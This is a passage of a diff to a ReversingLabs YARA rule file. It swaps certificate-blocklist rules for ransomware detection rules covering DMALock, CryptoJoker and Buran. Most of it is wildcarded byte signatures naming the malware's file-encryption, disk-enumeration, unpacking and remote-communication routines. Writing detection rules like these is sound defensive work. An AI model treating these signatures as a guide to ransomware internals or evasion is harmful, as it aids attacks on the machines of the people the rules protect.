8B 46 ?? 8B 4E ?? + 50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 32 C0 C3 + } + $dmalock_v4_encrypt_file_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? + ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 56 + 32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 56 + 6A ?? 89 45 ?? 89 45 ?? 66 89 45 ?? 8D 45 ?? 6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ?? + 8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? 6A ?? 57 56 E8 + ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ?? + 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $dmalock_v4_encrypt_file_2 = { + 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? + ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B + D8 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? ?? 85 F6 74 + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46 ?? 85 C0 74 ?? 8B 75 ?? B9 ?? ?? ?? + ?? 8B F8 F3 A5 66 A5 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46 + ?? EB ?? 33 F6 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 7E ?? 57 89 35 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B C6 E8 ?? ?? ?? ?? 84 C0 74 ?? 8B 4E ?? 8B 17 56 6A + ?? 6A ?? 68 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? C6 46 ?? ?? 8B B5 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 53 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 56 6A ?? 6A ?? 68 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 56 52 6A ?? 53 E8 ?? ?? ?? ?? 8B 45 ?? + 8B 8D ?? ?? ?? ?? 56 50 6A ?? 51 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 + CD B8 ?? ?? ?? ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "William Richard John" and pe.signatures[i].serial=="0c:15" and 1387324799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1) or ($dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_2) or ($dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_3) or ($dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1 and $dmalock_v2_enum_logical_disks) or ($dmalock_v4_encrypt_file_1 and $dmalock_v4_encrypt_file_2 and $dmalock_v4_remote_server_communication and $dmalock_v2_enum_logical_disks) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0C0F : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Cryptojoker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects CryptoJoker ransomware." author = "ReversingLabs" - id = "919a62ba-2902-5088-ad92-9f1bae23e68f" - date = "2023-11-08" - modified = "2023-11-08" + id = "50a9280b-a352-5a2b-acee-5690e509dfd7" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L315-L331" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0f8fda07dc362b7e04892446f1abe1e5f5717ee715824a2c1f6550096c366701" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.CryptoJoker.yara#L1-L140" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "42ee1e63ada1ae986f43a1300eda0b1fa7b54c26be31ef5637bb321defffbe40" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "CryptoJoker" + tc_detection_factor = 5 importance = 25 + strings: + $call_encrypt = { + 2B 02 26 16 FE 09 00 00 FE 09 01 00 FE 09 02 00 6F ?? ?? ?? ?? 2A + } + $encrypt_files = { + 2B 02 26 16 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 20 00 04 ?? ?? 73 ?? ?? ?? ?? 0C 20 05 ?? ?? ?? + 16 39 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 20 04 ?? ?? ?? FE ?? ?? ?? FE ?? ?? + ?? 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26 + 20 03 ?? ?? ?? 16 39 ?? ?? ?? ?? 26 00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? + ?? ?? ?? 26 20 00 ?? ?? ?? 38 ?? ?? ?? ?? 00 00 08 06 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? + ?? ?? 26 20 03 ?? ?? ?? 38 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 13 04 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? + 26 00 08 07 17 28 ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 20 03 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ?? ?? + ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26 20 02 ?? ?? ?? 38 ?? ?? ?? ?? 11 04 + 13 05 DD ?? ?? ?? ?? 00 08 16 28 ?? ?? ?? ?? 00 00 DC 08 14 FE 01 13 06 11 06 3A ?? ?? ?? ?? 08 28 ?? ?? ?? + ?? 00 DC 00 11 05 2A + } + $start_process = { + 2B ?? 26 16 20 10 ?? ?? ?? 38 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 20 ?? ?? ?? ?? + 38 ?? ?? ?? ?? 00 11 05 17 28 ?? ?? ?? ?? 20 06 ?? ?? ?? 38 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? + 0A 20 09 ?? ?? ?? 38 ?? ?? ?? ?? 00 11 05 08 28 ?? ?? ?? ?? 20 12 ?? ?? ?? 38 ?? ?? ?? ?? + 11 06 17 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 + ?? ?? ?? ?? 11 05 17 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 06 19 20 ?? ?? ?? ?? + 28 ?? ?? ?? ?? A2 20 0F ?? ?? ?? 38 ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 13 06 20 02 ?? ?? ?? 38 + ?? ?? ?? ?? 00 11 04 28 ?? ?? ?? ?? 26 20 13 ?? ?? ?? 38 ?? ?? ?? ?? 08 09 28 ?? ?? ?? ?? + 20 07 ?? ?? ?? 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 05 38 ?? ?? ?? ?? 26 20 0D ?? ?? ?? 38 ?? + ?? ?? ?? 11 06 0D 38 ?? ?? ?? ?? 20 10 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ?? + ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? + ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? + ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 20 08 ?? ?? ?? 17 3A ?? ?? ?? ?? + 26 11 06 18 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 00 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? + 26 06 07 28 ?? ?? ?? ?? 0C 20 0B ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 11 06 16 20 ?? + ?? ?? ?? 28 ?? ?? ?? ?? A2 17 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 26 20 03 ?? ?? ?? 16 39 ?? ?? + ?? ?? 26 00 11 04 11 05 28 ?? ?? ?? ?? 20 0A ?? ?? ?? 17 3A ?? ?? ?? ?? 26 00 73 ?? ?? ?? + ?? 13 04 20 04 ?? ?? ?? 38 ?? ?? ?? ?? 2A + } + $msgbox_timer = { + 00 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 28 ?? ?? ?? ?? 0C + 00 02 7B ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE 12 08 14 FE 01 + 13 04 11 04 2D ?? 08 6F ?? ?? ?? ?? 00 DC 00 02 7B ?? ?? ?? ?? 16 32 0E 02 7B + ?? ?? ?? ?? 16 FE 04 16 FE 01 2B ?? 16 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ?? + ?? 6F ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 38 ?? ?? ?? ?? 02 7B ?? + ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 16 FE 01 16 FE 01 2B + ?? 17 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? + ?? 0D 09 17 6F ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F 40 28 ?? + ?? ?? ?? 26 00 38 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04 11 + 04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04 + 11 04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 FE 01 13 04 11 04 + 2D ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ?? + 17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 02 7B + ?? ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? + ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? + ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? + ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ?? + ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? + 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? + ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ?? ?? + ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 02 + 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2A + } + $unzip_packed_file = { + 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 0B 06 07 2E ?? 07 06 28 ?? ?? ?? ?? 2D ?? 14 + 2A 02 73 ?? ?? ?? ?? 0C 16 8D ?? ?? ?? ?? 0D 08 6F ?? ?? ?? ?? 13 04 11 04 20 + ?? ?? ?? ?? 40 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 68 13 05 08 6F ?? ?? ?? ?? 13 06 + 08 6F ?? ?? ?? ?? 13 07 11 04 20 ?? ?? ?? ?? 33 ?? 11 05 1F 14 33 ?? 11 06 2D + ?? 11 07 1E 2E ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ?? ?? 26 08 6F + ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 13 08 08 6F ?? ?? ?? ?? + 13 09 08 6F ?? ?? ?? ?? 13 0A 11 09 16 31 ?? 11 09 8D ?? ?? ?? ?? 13 0B 08 11 + 0B 16 11 09 6F ?? ?? ?? ?? 26 11 0A 16 31 ?? 11 0A 8D ?? ?? ?? ?? 13 0C 08 11 + 0C 16 11 0A 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 59 D4 8D ?? + ?? ?? ?? 13 0D 08 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ?? 26 11 0D 73 ?? ?? ?? ?? + 13 0E 11 08 8D ?? ?? ?? ?? 0D 11 0E 09 16 09 8E 69 6F ?? ?? ?? ?? 26 14 13 0D + 38 ?? ?? ?? ?? 11 04 1F 18 63 13 0F 11 04 11 0F 1F 18 62 59 13 04 11 04 20 ?? + ?? ?? ?? 40 ?? ?? ?? ?? 11 0F 17 33 ?? 08 6F ?? ?? ?? ?? 13 10 11 10 8D ?? ?? + ?? ?? 0D 16 13 11 2B ?? 08 6F ?? ?? ?? ?? 13 12 08 6F ?? ?? ?? ?? 13 13 11 12 + 8D ?? ?? ?? ?? 13 15 08 11 15 16 11 15 8E 69 6F ?? ?? ?? ?? 26 11 15 73 ?? ?? + ?? ?? 13 14 11 14 09 11 11 11 13 6F ?? ?? ?? ?? 26 11 11 11 13 58 13 11 11 11 + 11 10 32 ?? 11 0F 18 33 ?? 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 13 16 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 17 11 16 11 17 17 + 28 ?? ?? ?? ?? 13 18 11 18 02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 19 11 19 28 + ?? ?? ?? ?? 0D DE ?? 11 18 2C ?? 11 18 6F ?? ?? ?? ?? DC 11 0F 19 33 ?? 1F 10 + 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1A 1F 10 8D ?? ?? ?? ?? 25 + D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1B 11 1A 11 1B 17 28 ?? ?? ?? ?? 13 1C 11 1C + 02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 1D 11 1D 28 ?? ?? ?? ?? 0D DE 17 11 1C + 2C ?? 11 1C 6F ?? ?? ?? ?? DC 72 B5 0E 00 70 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ?? + ?? 14 0C 09 2A + } + $resolve_assembly = { + 12 00 03 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 12 00 16 28 ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 + 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ?? 13 13 11 13 16 1F + 2C 9D 11 13 6F ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 13 04 16 13 05 16 13 06 16 13 07 2B ?? + 09 11 07 9A 08 28 ?? ?? ?? ?? 2C 0A 09 11 07 17 58 9A 13 04 2B ?? 11 07 18 58 13 07 + 11 07 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 2D ?? 12 00 7B ?? ?? ?? ?? 6F ?? ?? + ?? ?? 2D ?? 28 ?? ?? ?? ?? 12 00 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 16 + 13 08 2B ?? 09 11 08 9A 08 28 ?? ?? ?? ?? 2C ?? 09 11 08 17 58 9A 13 04 2B ?? 11 08 + 18 58 13 08 11 08 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 11 04 + 16 6F ?? ?? ?? ?? 1F 5B 33 ?? 11 04 1F 5D 6F ?? ?? ?? ?? 13 09 11 04 17 11 09 17 59 + 6F ?? ?? ?? ?? 13 0A 11 0A 1F 7A 6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 05 11 0A 1F 74 + 6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 06 11 04 11 09 17 58 6F ?? ?? ?? ?? 13 04 7E ?? + ?? ?? ?? 25 13 14 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 04 6F ?? ?? ?? ?? 2C ?? 7E ?? ?? + ?? ?? 11 04 6F ?? ?? ?? ?? 13 12 DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 6F ?? ?? ?? ?? + 13 0B 11 0B 39 ?? ?? ?? ?? 11 0B 6F ?? ?? ?? ?? 69 13 0C 11 0C 8D ?? ?? ?? ?? 13 0D + 11 0B 11 0D 16 11 0C 6F ?? ?? ?? ?? 26 11 05 2C ?? 11 0D 28 ?? ?? ?? ?? 13 0D 14 13 + 0E 11 06 2D ?? 11 0D 28 ?? ?? ?? ?? 13 0E DE 0C 26 17 13 06 DE ?? 26 17 13 06 DE ?? + 11 06 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 28 ?? ?? ?? ?? 13 0F 11 0F 28 ?? ?? + ?? ?? 26 11 0F 12 00 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 10 11 10 28 ?? + ?? ?? ?? 2D ?? 11 10 28 ?? ?? ?? ?? 13 11 11 11 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ?? + 11 11 6F ?? ?? ?? ?? 11 10 14 1A 28 ?? ?? ?? ?? 26 11 0F 14 1A 28 ?? ?? ?? ?? 26 11 + 10 28 ?? ?? ?? ?? 13 0E DE ?? 26 DE ?? 7E ?? ?? ?? ?? 11 04 11 0E 6F ?? ?? ?? ?? 11 + 0E 13 12 DE ?? DE ?? 11 14 28 ?? ?? ?? ?? DC 14 2A 11 12 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dmitry Vasilev" and pe.signatures[i].serial=="0c:0f" and 1386719999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($call_encrypt and $encrypt_files and $start_process) or ($msgbox_timer) or ($unzip_packed_file and $resolve_assembly)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_06A164Ec5978497741Ee6Cec9966871B : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Buran : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Buran ransomware." author = "ReversingLabs" - id = "6c73206d-3d5c-5540-a2e1-d00138d7e1b5" - date = "2023-11-08" - modified = "2023-11-08" + id = "c2a36a8b-5c21-5c31-994d-b424c038dd21" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L333-L349" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8a27015d94a3bd8543a8ca9202831ffc9c9e65f61bf26ed6825c3e746b6af0d4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Buran.yara#L1-L91" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5606e0acecd99ccf2feaa995353211302903a09bb2c4ec65903566215e2d5ca4" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Buran" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "JOHN WILLIAM RICHARD" and pe.signatures[i].serial=="06:a1:64:ec:59:78:49:77:41:ee:6c:ec:99:66:87:1b" and 1385596799<=pe.signatures[i].not_after) -} -import "pe" + strings: + $find_files = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D + ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? + 89 5D ?? 89 5D ?? 88 8D ?? ?? ?? ?? 88 95 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? E8 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF + 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? + ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 + C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? + 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 + C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 + 74 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 33 C9 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 + 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 + } + $encrypt_files = { + 53 56 57 55 BB ?? ?? ?? ?? BF ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3F ?? 74 ?? 8B 07 89 + C6 33 C0 89 07 FF D6 83 3F ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 33 C0 89 + 43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 7B ?? 85 FF 74 + ?? 8B C7 E8 ?? ?? ?? ?? 8B 6B ?? 8B 75 ?? 3B 75 ?? 74 ?? 85 F6 74 ?? 56 E8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? FF 53 ?? 80 7B ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 3B + ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 8B 03 8B F0 8B FB B9 ?? ?? ?? ?? F3 A5 E9 ?? ?? ?? ?? 5D 5F 5E 5B C3 A3 + } + $remote_connection_p1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 50 83 C4 ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? + ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89 + 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF + 30 64 89 20 8B C3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 89 45 + ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 BE ?? ?? + ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? + ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 + } + $remote_connection_p2 = { + 50 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 + ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? B8 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? 